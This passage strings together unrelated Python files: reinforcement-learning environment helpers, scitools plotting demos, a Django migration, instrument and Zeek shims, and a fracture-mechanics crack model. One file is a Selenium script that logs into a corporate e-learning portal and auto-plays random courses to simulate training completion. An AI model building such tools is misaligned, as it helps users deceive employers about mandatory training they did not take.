env_method(self, method_name, *method_args, indices=None, **method_kwargs): """Call instance methods of vectorized environments.""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('env_method', (method_name, method_args, method_kwargs))) return [remote.recv() for remote in target_remotes] def _get_target_remotes(self, indices): """ Get the connection object needed to communicate with the wanted envs that are in subprocesses. :param indices: (None,int,Iterable) refers to indices of envs. :return: ([multiprocessing.Connection]) Connection object to communicate between processes. """ indices = self._get_indices(indices) return [self.remotes[i] for i in indices] def tile_images(img_nhwc): """ Tile N images into one big PxQ image (P,Q) are chosen to be as close as possible, and if N is square, then P=Q. :param img_nhwc: (list) list or array of images, ndim=4 once turned into array. 
img nhwc n = batch index, h = height, w = width, c = channel :return: (numpy float) img_HWc, ndim=3 """ img_nhwc = np.asarray(img_nhwc) n_images, height, width, n_channels = img_nhwc.shape # new_height was named H before new_height = int(np.ceil(np.sqrt(n_images))) # new_width was named W before new_width = int(np.ceil(float(n_images) / new_height)) img_nhwc = np.array(list(img_nhwc) + [img_nhwc[0] * 0 for _ in range(n_images, new_height * new_width)]) # img_HWhwc out_image = img_nhwc.reshape(new_height, new_width, height, width, n_channels) # img_HhWwc out_image = out_image.transpose(0, 2, 1, 3, 4) # img_Hh_Ww_c out_image = out_image.reshape(new_height * height, new_width * width, n_channels) return out_image #!/usr/bin/env python from scitools.std import * # A simple contour plot of the peaks function (standard test function): contour(peaks()) figure() # Here we draw 15 red contour lines with double line width: xv, yv = ndgrid(linspace(-3, 3, 51), linspace(-3, 3, 51)) values = xv*exp(-xv**2 - yv**2) contour(xv, yv, values, 15, 'r', linewidth=2) figure() # Draw contour lines with labels at -2, 0, 2, and 5: values = peaks(xv, yv) contour(xv, yv, values, [-2,0,2,5]) figure() # Here we combine a contour plot with a quiver plot # (note: currently not working with the Gnuplot backend): x = y = linspace(-2, 2, 21) xv, yv = ndgrid(x, y) # or meshgrid(x, y, indexing='ij') values = sin(xv)*sin(yv)*exp(-xv**2 - xv**2) dx, dy = gradient(values) contour(xv, yv, values, 10, show=False) hold('on') quiver(xv, yv, dx, dy, 2, show=True) hold('off') figure() # Another example with contour labels: x = linspace(-2,2,201) y = linspace(-1,1,51) xv, yv = ndgrid(x,y) values = sin(3*yv - xv**2 + 1) + cos(2*yv**2 - 2*xv) contour(xv, yv, values, clabels='on') # contour(x,y,values,..) also works figure() # The contourf command draws filled contours: values = peaks(201) contourf(values, 10, caxis=[-20, 20], title='Filled Contour Plot') raw_input('Press Return key to quit: ') kennywj/web_crawler0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys import re import datetime import time import random from selenium import webdriver from selenium.webdriver.common.keys import Keys from selenium.webdriver.common.by import By from selenium.webdriver.common.action_chains import ActionChains from selenium.common.exceptions import ElementNotInteractableException, TimeoutException, NoSuchElementException from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC URL_ELEARNING = 'http://issbg.efoxconn.com/semielearning/#/login' class ELearning(): """This module provides auto-display elearning web page function. 
""" def __init__(self, username, password, max_window=True, video_timeout=0, change_page_time=1): """[ parameters ] username : user name for the web page password : the max_window : maximum window or minimum window video_timeout : maximum video playback time (seconds) change_page_time : time for change page (seconds) """ self.username = username self.password = password self.max_window = max_window self.delay = 5 self.video_timeout = video_timeout self.change_page_time = change_page_time self._init_variables() def _init_variables(self): self.counter = 0 self.driver = None self.wait = None self.num_category = 0 self.index_category = 0 self.category = None self.num_topic = 0 self.index_topic = 0 self.topic = None def select_category(self): self.category = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'category-title'))) self.category = self.driver.find_elements_by_class_name('category-title') self.num_category = len(self.category) assert self.num_category > 0 # avoid all category self.index_category = random.randint(1, self.num_category - 1) element = self.category[self.index_category] element.click() # if we don't sleep here, we will read the previous total-results time.sleep(5) item = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'total-results'))) self.num_topic = int(re.findall(r'\d+', item.text)[2]) assert self.num_topic > 0 print('[ select category: %s with %d items ]' % (element.text, self.num_topic)) def _select_tab(self, index): x = 0 while x < index: element = self.wait.until(EC.element_to_be_clickable((By.CLASS_NAME, "btn-next"))) element.click() x = x + 1 def select_topic(self): self.index_topic = random.randint(0, self.num_topic - 1) self._select_tab(self.index_topic // 10) topic_xpath = '//div[@class="el-table__body-wrapper"]/table/tbody/tr[{}]/td[1]'.format((self.index_topic % 10) + 1) element = self.wait.until(EC.presence_of_element_located((By.XPATH, topic_xpath))) element.click() print('[ select topic: %s (%d) ]' % (element.text, self.index_topic)) def _play_document(self, number): element = self.driver.find_element_by_class_name('content-container') focus = ActionChains(self.driver).move_to_element(element).click() focus.perform() html = self.driver.find_element_by_tag_name('html') number = number + (number // 2) for _ in range(number): html.send_keys(Keys.PAGE_DOWN) time.sleep(self.change_page_time) html.send_keys(Keys.END) time.sleep(self.change_page_time) html.send_keys(Keys.END) time.sleep(self.change_page_time) def _play_video(self): begin = datetime.datetime.now().timestamp() while True: element = self.driver.find_element_by_xpath("//span[@class='vjs-remaining-time-display']") if element.text == '-0:00': break time.sleep(5) if self.video_timeout > 0: if (datetime.datetime.now().timestamp() - begin) > self.video_timeout: break def play(self): items = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'info-card-file'))) items = self.driver.find_elements_by_class_name('info-card-file') num_item = len(items) for index in range(num_item): item = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'info-card-file'))) item = self.driver.find_elements_by_class_name('info-card-file')[index] print('[ play start: %s ]' % item.text) item.click() time.sleep(5) try: element = self.driver.find_element_by_xpath('//*[@id="buttons"]/a') num_page = int(re.findall(r'\d+', element.text)[1]) print('type document: %s pages' % num_page) self._play_document(num_page) except NoSuchElementException: print('type video') 
self._play_video() print('[ play end ]') self._previous_page() self._previous_page()

    def _previous_page(self):
        element = self.wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'back-title')))
        element.click()
        time.sleep(1)

    def open(self):
        self.driver = webdriver.Chrome()
        if self.max_window:
            self.driver.maximize_window()
        else:
            self.driver.minimize_window()
        self.driver.get(URL_ELEARNING)
        self.wait = WebDriverWait(self.driver, 10)
        element = self.wait.until(EC.presence_of_element_located((By.XPATH, "//input[@placeholder='帳號']")))
        element.send_keys(self.username)
        element = self.wait.until(EC.presence_of_element_located((By.XPATH, "//input[@placeholder='密碼']")))
        element.send_keys(self.password)
        button = None
        buttons = self.driver.find_elements_by_css_selector("button")
        for btn in buttons:
            if btn.text == '登入':
                button = btn
        button.click()

    def close(self):
        element = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '.el-dropdown-link')))
        focus = ActionChains(self.driver).move_to_element(element).click()
        focus.perform()
        try:
            element = self.wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '.el-dropdown-menu__item:nth-child(2)')))
            element.click()
            element = self.wait.until(EC.element_to_be_clickable((By.XPATH, "//div[@class='el-message-box__btns']/button[2]")))
            element.click()
        except (ElementNotInteractableException, TimeoutException):
            print('Close page without logout.')
        self.driver.close()
        self.driver = None


if __name__ == '__main__':
    if len(sys.argv) != 6:
        sys.exit()
    username = sys.argv[1]
    password = sys.argv[2]
    number = int(sys.argv[3])
    max_window = True
    video_timeout = int(sys.argv[4])
    change_page_time = int(sys.argv[5])
    web = ELearning(username, password, max_window, video_timeout, change_page_time)
    web.open()
    for _ in range(number):
        web.select_category()
        web.select_topic()
        web.play()
        time.sleep(3)
    web.close()
    print('bye bye')

from typing import List

import numpy as np
from scipy import stats


def calculate_correlation(x: List[float], y: List[float]):
    assert len(x) == len(y)
    return np.corrcoef(x, y)[0][1], stats.ttest_ind(x, y)[1]

Sherba/AdventureReader
# Generated by Django 3.0.8 on 2020-07-20 22:02

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('stories', '0010_auto_20200721_0000'),
    ]

    operations = [
        migrations.AlterField(
            model_name='post',
            name='genres',
            field=models.ManyToManyField(blank=True, to='stories.Genre'),
        ),
    ]

from collections import OrderedDict
import time

from ._base import Base


class IsSensor(Base):
    def __init__(self, yaq_client, *, name=None):
        super().__init__(yaq_client, name=name)
        status = self.trigger()  # need to run once to get channel information
        while not status.done:
            time.sleep(0.01)
        self._yaq_channel_names = self.yaq_client.get_channel_names()
        self._yaq_channel_units = self.yaq_client.get_channel_units()
        self._yaq_channel_shapes = self.yaq_client.get_channel_shapes()

    def _describe(self, out):
        out = super()._describe(out)
        for name in self._yaq_channel_names:
            meta = OrderedDict()
            meta["shape"] = tuple(self._yaq_channel_shapes.get(name, ()))
            meta["dtype"] = "array" if meta["shape"] else "number"
            meta["units"] = self._yaq_channel_units.get(name)
            out[f"{self.name}_{name}"] = OrderedDict(self._field_metadata, **meta)
        return out

    @property
    def hints(self):
        out = super().hints
        out["fields"] += [f"{self.name}_{n}" for n in self._yaq_channel_names]
        return out

    def _read(self, out, ts) -> OrderedDict:
        out = super()._read(out, ts)
        measured = self.yaq_client.get_measured() # locked by behavior of super().read for
name in self._yaq_channel_names: out[f"{self.name}_{name}"] = {"value": measured[name], "timestamp": ts} return out 1-10 from __future__ import print_function from . import zeek import traceback import sys class Event(zeek.Event): warnings_emitted = set() def __new__(cls, *args, **kwargs): stack_info = traceback.extract_stack()[0] usage_file = stack_info[0] usage_line = stack_info[1] usage_text = stack_info[3] if (usage_file, usage_line) not in Event.warnings_emitted: print('File "{}", line {}: deprecated bro.event usage,' ' use zeek.Event instead:\n {}'.format( usage_file, usage_line, usage_text), file=sys.stderr) Event.warnings_emitted.add((usage_file, usage_line)) return super(Event, cls).__new__(cls, *args, **kwargs) src/webex-teams/list-people.py # Fill in this file with the people listing code from the Webex Teams exercise import os import os.path import csv import sys import copy import re import numpy as np from numpy import sqrt,log,pi,cos,arctan import scipy.optimize import scipy as sp import scipy.interpolate #if __name__=="__main__": # from matplotlib import pyplot as pl # pl.rc('text', usetex=True) # Support greek letters in plot legend # pass class ModeI_crack_model(object): # abstract class # # Implementations should define: # * methods: # * eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(self,a) # * evaluate_ModeI_COD_vectorized(self,sigma_applied,x,xt) # should be vectorized over x (not necessarily xt) pass class ModeI_Beta_COD_Formula(ModeI_crack_model): """This represents a crack model where we are given a formula for K_I of the form K_I = sigma*sqrt(pi*a*beta), and COD is a function u(object,surface_position,surface_length). You can add member variables (which will be accessible from the u function) by providing them as keyword arguments to the constructor. At minimum you must provide a function: u(object,surface_position,surface_length) which should be vectorized over surface position, and a function beta(object), which return the COD and beta values respectively. 
(beta is a function, so you can set it up so that the crack model will work correctly if its attribute parameters are updated) """ u_per_unit_stress=None beta=None def __init__(self,**kwargs): if "u_per_unit_stress" not in kwargs: raise ValueError("Must provide COD function u_per_unit_stress(object,surface_position,surface_length)") if "beta" not in kwargs: raise ValueError("Must provide K coefficient beta(object)") for kwarg in kwargs: setattr(self,kwarg,kwargs[kwarg]) pass pass def eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(self,a): # For a mode I crack with the tip at the origin, intact material # to the right (x > 0), broken material to the left (x < 0) # The tensile stress @ theta=0 multiplied by sqrt(x)/(sqrt(a)*sigmaext) # where x ( > 0) is the position where the stress is measured, # a is the (half) length of the crack, and sigmaext # is the external tensile load # Per Suresh (9.43 and 9.44a) and Anderson (table 2.1) # and based on K_I=(sigma_ext*sqrt(pi*a*beta)) # instead of K_I=(sigma_ext*sqrt(pi*a)) sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = sqrt(self.beta(self))/sqrt(2.0) return sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext def eval_ModeI_COD_per_unit_stress_vectorized(self,x,xt): return self.u_per_unit_stress(self,x,xt) pass class ModeI_Beta_WeightFunction(ModeI_crack_model): """This represents a crack model where we are given a weight function weightfun_times_sqrt_aminx(object, x,a) representing the weight function m(x,a) multiplied by sqrt(a-x) You can add member variables (which will be accessible from the u function) by providing them as keyword arguments to the constructor. Does NOT assume the weight function is nondimensionalizable, so the weight function can have dimensional parameters NOTE: Do not change internal parameters after construction if using the surrogate, because the surrogate won't be updated! 
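    An illustrative construction (a sketch only; the helper
    my_weightfun_times_sqrt_aminx and the numeric values are hypothetical,
    not taken from this module):

        model = ModeI_Beta_WeightFunction(
            weightfun_times_sqrt_aminx=my_weightfun_times_sqrt_aminx,  # user-supplied M(x, a)
            epsx=1e-6,  # size of the analytically integrated region near the tip
            Eeff=200e9 / (1.0 - 0.33**2),  # plane strain effective modulus (assumed values)
            use_surrogate=False)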
""" # Settable parameters weightfun_times_sqrt_aminx=None epsx=None Eeff = None # = E for plane stress, = E/(1-nu^2) for plane strain surrogate_a = None # Range of crack lengths used for surrogate use_surrogate=None plot_surrogate=None # These are lambdas set by the constructor K_I_ov_sigma_ext_vect=None K_I_ov_sigma_ext_surrogate=None K_I_ov_sigma_ext_use=None def __init__(self,**kwargs): self.use_surrogate=False self.plot_surrogate=False if "weightfun_times_sqrt_aminx" not in kwargs: raise ValueError("Must provide singularity-compensated weight function weightfun_time_sqrt_aminx(object,x,a)") if "epsx" not in kwargs: raise ValueError("Must provide epsilon_x representing the size of the small analytically integrated region around the tip singularity") if "Eeff" not in kwargs: raise ValueError("Must provide Eeff (effective modulus)") for kwarg in kwargs: setattr(self,kwarg,kwargs[kwarg]) pass # Create K_I_ov_sigma_ext_vec and its surrogate K_I_ov_sigma_ext = lambda a : scipy.integrate.quad(lambda u : self.weightfun_times_sqrt_aminx(self,u,a)/np.sqrt(a-u),-a,a-self.epsx)[0] + self.weightfun_times_sqrt_aminx(self,a,a)*2.0*sqrt(self.epsx) self.K_I_ov_sigma_ext_vect = np.vectorize(K_I_ov_sigma_ext) self.K_I_ov_sigma_ext_use = self.K_I_ov_sigma_ext_vect # overridden by self.use_surrogate below if self.use_surrogate or self.plot_surrogate: # simple splrep surrogate K_I_ov_sigma_ext_eval=self.K_I_ov_sigma_ext_vect(self.surrogate_a) (t1,c1,k1) = sp.interpolate.splrep(self.surrogate_a,K_I_ov_sigma_ext_eval) self.K_I_ov_sigma_ext_surrogate = lambda a: sp.interpolate.splev(a,(t1,c1,k1),ext=2) surrogate_a_fine=np.linspace(self.surrogate_a[0],self.surrogate_a[-1],self.surrogate_a.shape[0]*4) if self.plot_surrogate: from matplotlib import pyplot as pl pl.figure() pl.plot(surrogate_a_fine,self.K_I_ov_sigma_ext_vect(surrogate_a_fine),'-', surrogate_a_fine,self.K_I_ov_sigma_ext_surrogate(surrogate_a_fine),'-') pl.title("K$_I$ over sigma$_{ext}$") pl.legend(("Direct","Surrogate")) pass if self.use_surrogate: self.K_I_ov_sigma_ext_use = self.K_I_ov_sigma_ext_surrogate pass pass pass def eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(self,a): # sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = ([ integral_-a^(a-epsilon) M(x,a)/sqrt(a-x) dx + M(a,a)*2sqrt(epsilon) ] / sqrt(2*pi)) sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = (scipy.integrate.quad(lambda x: self.weightfun_times_sqrt_aminx(self,x,a)/np.sqrt(a-x),-a,a-self.epsx)[0] + self.weightfun_times_sqrt_aminx(self,a,a)*2.0*np.sqrt(self.epsx)) / (np.sqrt(2*pi*a)) # unit check: (should be unitless) # Integral of stress*weight function*dx = SIF (i.e. stress*sqrt(meters)) # units of weight function = 1/sqrt(meters) # units of weightfun_times_sqrt_aminx = unitless # Units of sigmaI_theta0_times_rootr_over_sqrta_over_sigmaext: # ((1/sqrt(meters))*meters + sqrt(meters) ) / sqrt(meters) # = unitless (check) return sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext def eval_ModeI_COD_per_unit_stress_vectorized(self,x,xt): # we are using weightfunctions # New implementation with weight functions: # m = (E'/2K) du/da (Anderson, Fracture Mechanics, eq. 2.50 and Rice (1972) eq. 13 # u = integral_x..xt (2K/E') m(x,a) da # u = integral_x..xt (2K/E') M(x,a)/sqrt(a-x) da # need K... 
well from above K_I(a) = sigma_ext * [ integral_0^(a-epsilon) M(u,a)/sqrt(a-u) du + M(a,a)*2sqrt(epsilon) ] # u = (2.0/E') * integral_x..xt K_I(a) M(x,a)/sqrt(a-x) da # u = (2.0/E') * [ integral_x..(x+epsilon) K_I(a) M(x,a)/sqrt(a-x) da + integral_(x+epsilon)..xt K_I(a) M(x,a)/sqrt(a-x) da ] # u = (2.0/E') * [ K_I(x) M(x,x) integral_x..(x+epsilon) 1.0/sqrt(a-x) da + integral_(x+epsilon)..xt K_I(a) M(x,a)/sqrt(a-x) da ] # # as above we can evaluate the left hand integral to be 2*sqrt(epsilon) # so # u = (2.0/E') * [ K_I(x) M(x,x) 2*sqrt(epsilon) + integral_(x+epsilon)..a K_I(a) M(x,a)/sqrt(a-x) da ] # # NOTE: POSSIBLE PROBLEM... Should be dependent on nu? (Poisson's ratio?) right_integral = lambda _x : scipy.integrate.quad(lambda a: self.K_I_ov_sigma_ext_use(a)*self.weightfun_times_sqrt_aminx(self,_x,a)/np.sqrt(a-_x),_x+self.epsx,xt)[0] right_integral_vect = np.vectorize(right_integral) u_per_unit_stress = (2.0/self.Eeff) * ( self.K_I_ov_sigma_ext_use(x)*self.weightfun_times_sqrt_aminx(self,x,x)*2.0*np.sqrt(self.epsx) + right_integral_vect(x)) return u_per_unit_stress pass def indef_integral_of_simple_squareroot_quotients(a,u): """ This routine is no longer used because integrated out to infinity the form of solution kernel that goes with this fails load balancing... See indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt) for the replacement""" (a,u) = np.broadcast_arrays(a,u) # make sure a and u are the same shape # From Wolfram Alpha: integral of (sqrt(u)/sqrt(a-u)) du # = a*arctan(sqrt(u)/sqrt(a-u)) - sqrt(u)*sqrt(a-u) #if (a==u).any(): # raise ValueError("Divide by zero") # return a*arctan(sqrt(u)/sqrt(a-u)) - sqrt(u)*sqrt(a-u) # Calculate division-by-zero and # non division-by-zero regimes separately # Limiting case as a-u -> 0: # Let v = a-u -> u = a-v # integral = a*arctan(sqrt(a-v)/sqrt(v)) - sqrt(a-v)*sqrt(v) # Per wolfram alpha: limit as v approaches 0 + of a*atan(sqrt(a-v)/sqrt(v)) # = pi*a/2.0 divzero = (a==u) | ((np.abs(a-u) < 1e-10*a) & (np.abs(a-u) < 1e-10*u)) #if np.count_nonzero(a < u) > 0: # import pdb # pdb.set_trace() # pass integral = np.zeros(a.shape[0],dtype='d') integral[~divzero] = a[~divzero]*arctan(sqrt(u[~divzero])/sqrt(a[~divzero]-u[~divzero])) - sqrt(u[~divzero])*sqrt(a[~divzero]-u[~divzero]) integral[divzero] = np.pi*a[divzero]/2.0 return integral def indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt): """ This is the indefinite integral of the crack tip stress solution for an open linear elastic crack. ___ / \/x_t / r0 \2 | --===- * |--------| dx_t / \/ r \(r + r0)/ where r is implicitly defined as x - x_t and r0 as b*x_t. The first factor represents the standard sqrt(a) divided by the square root of the radius away from the crack decay that is found in standard crack tip stress solutions e.g. Anderson (2004), and Tada (2000). However, this alone does not accurate account for the load balance in of the load that would have been carried by half of the crack surface and the load that would be added ahead of the crack tip. There is presumed to be another constant term outside this integral matching the load at infinity. The second factor in the integral represents additional decay of the 1/sqrt(r) singularity which, combined with the outside constant term) enforces the load balance of the stress state as r is integrated to infinity. 
This function of r0 complicates the integral because not only is r = x - x_t a function of x_t (the variable of integration), r0 is also a function of x_t (r0 is presumed to have the form constant*x_t, where this constant will be refered to as b=r0_over_a). The resulting integral is: ___ / \/x_t / b*x_t \2 | --=======- * |-------------------| dx_t / \/x - x_t \((x - x_t) + b*x_t)/ The function inputs are: crack_model - contains the values describing the particular 1/sqrt(r) LEFM tip model desired, including a function returning the r0_over_a value needed for the integral. The assumption is that r0_over_a, even though it is given parameters including x_t, is not actually dependent on x_t. If there is dependence on x_t then this solution is not correct (but may be close enough for practical purposes). x - the x value or range along the crack that the evaluated integral is being calculated over, not the variable of integration xt - the value or range of half crack length that the indefinite integral is being evaluated at This function then returns the indefinite integral evaluated at (x,x_t) """ (x,xt) = np.broadcast_arrays(x,xt) # make sure x and xt are the same shape #From Wolfram Alpha: # integrate ((sqrt(u))/(sqrt(a-u)))*((b*u)/((a-u)+b*u))^2 du = #Plain-Text Wolfram Alpha output # (b^2 (-(((-1 + b) Sqrt[a - u] Sqrt[u] (a (1 + b) + (-1 + b) b u))/(b # (a + (-1 + b) u))) + a (-5 + b) ArcTan[Sqrt[u]/Sqrt[a - u]] + (a (-1 + # 5 b) ArcTan[(Sqrt[b] Sqrt[u])/Sqrt[a - u]])/b^(3/2)))/(-1 + b)^3 #where b*u = r0 --> b = r0_over_a, u = xt, and a = x # Calculate division-by-zero and # non division-by-zero regimes separately # Limiting case as x-xt -> 0: # Let r = x-xt -> xt = x-r # # The limit approaches ((b**2)/(b-1)**3)*(pi/2.0)*((x*(5*b-1)/(b**(3./2.))) # +(x*(b-5))) as r->0 divzero = (x==xt) | ((np.abs(x-xt) < 1e-10*x) & (np.abs(x-xt) < 1e-10*xt)) #if np.count_nonzero(x < xt) > 0: # import pdb # pdb.set_trace() # pass b = crack_model.r0_over_a(xt) f1=sqrt(xt[~divzero]) f2=sqrt(x[~divzero]-xt[~divzero]) A=((b**2)/(b-1)**3) B=((x[~divzero]*(5*b-1)*arctan((sqrt(b)*f1)/(f2)))/(b**(3./2.))) C=((b-1)*(f1)*(f2)*(x[~divzero]*(b+1)+(b-1)*b*xt[~divzero])) D=(b*(x[~divzero]+(b-1)*xt[~divzero])) E=(x[~divzero]*(b-5)*arctan(f1/f2)) integral = np.zeros(x.shape,dtype='d') integral[~divzero] =A*(B-(C/D)+E) integral[divzero] = ((b**2)/(b-1)**3)*(pi/2.0)*x[divzero]*(((5*b-1)/(b**(3./2.)))+(b-5)) return integral def integral_tensilestress_growing_effective_crack_length_byxt(x,sigmaext1,sigmaext_max,F,xt1,xt2,crack_model): """ Evaluate the incremental normal stress field on a mode I crack that is growing in effective length from xt1 to xt2 due to an external load (previous value sigmaext1, limiting value sigmaext_max) It is assumed that the effective tip moves linearly with applied external normal stress, with rate given by F (Pascals of external normal stress / meters of tip motion The external normal stress is presumed to be bounded by sigmaext_max (which may be np.Inf to leave it unbounded). In such a case it will evaluate the incremental normal stress only up to the length that gives sigmaext_max. Returns (use_xt2,sigmaext2,res) where use_xt2 is the actual upper bound of the integration (as limited by sigmaext_max), sigmaext2 is the external tensile stress load corresponding to the crack being opened to use_xt2, and which will be <= to sigmaext_max. Rationale: The mode I normal stress formula is: sigma_yy_crack = (K_I / sqrt(2*pi*r)) (Suresh, Eq. 9.44a at theta=0) ... 
we choose to add in the external field not being held by the crack and a decay factor from load balancing (see below) sigma_yy_total = (K_I / sqrt(2*pi*r))*(r0^2/(r+r0)^2) + sigma_ext In the region where the stress accumulates, to the right of the tip, the origin of the K_I is almost irrelevant. So we can use this formula even for different geometries/loading conditions. Using the weight function to find K, K_I = integral_0^a (sigma_ext(x) m(x,a) dx) For uniform loading, sigma_ext = independent of x, therefore K_I = sigma_ext * integral_0^a m(x,a) dx ... now m(x,a) has the form M(x,a)/sqrt(a-x) M(x,a) is weightfun_times_sqrt_aminx Break the integral into two pieces: K_I = sigma_ext * [ integral_0^(a-epsilon) M(x,a)/sqrt(a-x) dx + integral_(a-epsilon)^a M(x,a)/sqrt(a-x) dx ] Evaluate the left hand integral with quadrature integration. Evaluate the right hand integral analytically: integral_(a-epsilon)^a M(x,a)/sqrt(a-x) dx Treat M(x,a) as constant M(a,a) over the small region = M(a,a) * integral_(a-epsilon)^a 1/sqrt(a-x) dx Let u = a-x : du=-dx = M(a,a) * -integral_epsilon^0 u^(-1/2) du = M(a,a) * -2u^(1/2) |_epsilon^0 = M(a,a) * 2epsilon^(1/2) = 2 sqrt(epsilon) So K_I = sigma_ext * [ integral_0^(a-epsilon) M(x,a)/sqrt(a-x) dx + M(a,a)*2sqrt(epsilon) ] Now K_I/sigmaext = [ integral_0^(a-epsilon) M(x,a)/sqrt(a-x) dx + M(a,a)*2sqrt(epsilon) ] Let K_over_sigmaext = K_I/sigmaext From above. sigma_yy_crack = (K_I / sqrt(2*pi*r)) ... Call sigma_yy_crack/sigmaext now sigmaI and make it a function of r=x-xt and K_I/sigmaext So sigmaI(r,K_I/sigmaext) = K_over_sigmaext / sqrt(2*pi*(x-xt)) Let xt be the position of the effective tip at external load sigmaext The incremental normal stress field would be integral_sigmaext1^sigmaext2 of 1.0 + sigmaI(x-xt,K_over_sigmaext) dsigmaext (note that K and xt are dependent on sigmaext) The variable sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext represents the value of sigmayy_crack(x,K) with the above formula for K_I (either from the weight function or the simple K_I=sigma_ext*sqrt(pi*a)) substituted for K, evaluated for horizontal axis beyond the tip (i.e. theta=0) and then multiplied by sqrt(r) (sqrt(position beyond the tip) and divided by sqrt(cracklength) and also by sigmaext. So sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = ([ integral_0^(a-epsilon) M(x,a)/sqrt(a-x) dx + M(a,a)*2sqrt(epsilon) ] / (sqrt(2*pi*a))) Then we can rewrite the incremental normal stress as: integral_sigmaext1^sigmaext2 of sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*sqrt(xt)/sqrt(x-xt) dsigmaext if the entire stress field is presumed to come from the crack tip singularity. Here, xt is still dependent on sigmaext... sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext also has some dependence on a (i.e. 
xt), but as xt isn't moving much this is presumed to be small if we assume that a long way from the effective tip the stress is unform, we add 1.0 into the integral integral_sigmaext1^sigmaext2 of 1.0 + sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*sqrt(xt)/sqrt(x-xt) dsigmaext From force balancing (see total_load_matching.pdf) but using a (r0^2/(r+r0)^2) decay factor (see total_load_matching_crossterm_r2_work.pdf) we can apply that decay factor to the singular term, integral_sigmaext1^sigmaext2 of 1.0 + (r0^2/(r+r0)^2)*sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*sqrt(xt)/sqrt(x-xt) dsigmaext Here r is defined as sqrt(x-xt), and r0 -- evaluated per the above .pdfs -- is 8*xt/(pi^2*beta) (through crack, beta typically 1) or (2^(1/3))*xt/(pi^(2/3)*beta^(1/3)) (half penny surface crack, beta typically 4/(pi^2). ... because r and r0 are functions of xt, they are implicitly dependent on xt and need to be considered in the integration. this will give normal stress as a function of position (x). We assume xt is linearly dependent on normal stress: xt = xtp + (1/F)*(sigmaext-sigmaext1) where xtp is the final xt from the previous step. sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext is treated as constant, between xt1 and xt2 So our incremental tension is integral_sigmaext1^sigmaext2 (1.0 + sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext r0^2/(r+r0)^2 * sqrt(xt)/sqrt(x-xt)) dsigmaext where we ignore any contributions corresponding to (x-xt) <= 0 (the 1.0 term represents that beyond the effective tip the external load directly increments the stress state, in addition to the stress concentration caused by the presence of the open region; the r0^2/(r+r0)^2 actor makes the stress concentration integrate to the right load -- with r0 (proportional to xt) selected on that basis as discussed above and in the previously mentioned .pdfs. representing r0 as r0_over_xt*xt, and r by x-xt, the r0^2/(r+r0)^2 factor becomes r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 pull out constant term (sigmaext2-sigmaext1) + integral_sigmaext1^sigmaext2 sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 * sqrt(xt)/sqrt(x-xt) dsigmaext Perform change of integration variable sigmaext -> xt: Derivative of xt: dxt = (1/F)*dsigmaext dsigmaext = F*dxt So the incremental normal stress we are solving for is (sigmaext2-sigmaext1) + integral_xt1^xt2 sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 sqrt(xt)*F/sqrt(x-xt) dxt where we ignore any contributions corresponding to (x-xt) <= 0 and sigmaext2 = sigmaext1 + (xt2-xt1)*F F is a constant and sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext is treated as constant so have F*(xt2-xt1) + F * sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext * integral_xt1^xt2 r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 sqrt(xt)/(sqrt(x-xt)) dxt The right hand term is then the integral of r0_over_xt^2*xt^2/(x-xt+r0_over_xt*xt)^2 * (sqrt(xt)/sqrt(x-xt)) dxt with solution to the indefinite integral given by indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt) so the definite integral is given by indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt2) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt1) Well almost. We only consider the region of this integral where x-xt > 0. This can be accomplished by shifting the bounds when needed. x > xt => xt2 < x and xt1 < x ... 
